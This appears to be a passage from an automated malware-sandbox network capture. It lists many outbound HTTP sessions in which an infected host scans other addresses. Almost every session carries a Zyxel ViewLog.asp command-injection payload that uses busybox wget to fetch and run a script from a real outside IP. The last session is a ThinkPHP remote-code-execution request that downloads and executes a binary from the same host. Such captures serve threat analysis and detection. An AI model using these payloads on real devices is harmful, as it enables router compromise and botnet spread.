                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:01.121834993 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:12.385375977 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1252192.168.2.144158631.136.46.798080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:50.357584953 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:51.074217081 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:52.482170105 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:55.490044117 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:01.121965885 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:12.385487080 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1253192.168.2.144723094.122.23.2118080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:50.378108025 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1254192.168.2.145165894.123.125.598080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:50.380011082 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1255192.168.2.144292694.123.157.678080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:50.380512953 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1256192.168.2.145063494.121.55.838080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:50.381881952 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1257192.168.2.145261494.70.252.2088080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:50.618387938 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:50.893240929 CET36INHTTP/1.1 403 Forbidden


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1258192.168.2.144926285.105.55.1848080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:50.626344919 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:50.876295090 CET404INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:49 GMT
                                                        Server: Apache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1259192.168.2.145724294.122.88.1218080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:50.629463911 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1260192.168.2.143876694.187.224.2358080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:50.869353056 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:51.211960077 CET109INHTTP/1.1 302 Found
                                                        Location: https://192.168.0.14:443/cgi-bin/ViewLog.asp
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1261192.168.2.143766494.23.204.1148080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:51.379868984 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:51.579185009 CET304INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:51 GMT
                                                        Server: Apache
                                                        Content-Length: 126
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e
                                                        Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port;</script><h1>Error 400 - trying to redirect</h1>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1262192.168.2.145763831.136.55.228080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:51.402507067 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:52.098294973 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:53.446124077 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:56.258141994 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:01.633800030 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:12.385358095 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1263192.168.2.143423094.175.192.1268080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:51.403738022 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1264192.168.2.143859294.121.58.2148080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:51.427018881 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1265192.168.2.144096094.122.93.1568080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:51.430000067 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1266192.168.2.145480288.2.247.1680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:51.898806095 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:52.116090059 CET502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Wed, 14 Feb 2024 08:35:51 GMT
                                                        Connection: close
                                                        Content-Length: 311
